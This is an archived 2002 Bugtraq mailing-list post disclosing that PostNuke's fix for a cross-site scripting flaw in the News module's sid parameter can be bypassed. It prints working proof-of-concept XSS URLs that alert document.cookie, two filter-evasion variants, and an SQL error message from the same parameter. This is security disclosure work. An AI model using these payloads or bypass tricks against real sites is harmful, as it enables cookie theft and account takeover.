Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Postnuke XSS fixed
From: Daniel Woods <dwoods () ucalgary ca>
Date: Wed, 2 Oct 2002 10:09:33 -0600 (MDT)


Humm!

on 26th Sep the following url:
http://news.postnuke.com/modules.php
              ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

used to give Alert PopUp and
Error:
DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
at line 23

now it gives:
Sorry - $HTTP_GET_VARS contains javascript...

Prompt fix by PostNuke team, great work Keep it up! :)

Not so fast on the praise :(

It only took me a couple of workarounds to find ways to bypass the check.

  http://news.postnuke.com/modules.php
          ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Using the request...
          ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message

And using the request...
          ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.

Thanks... Dan.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault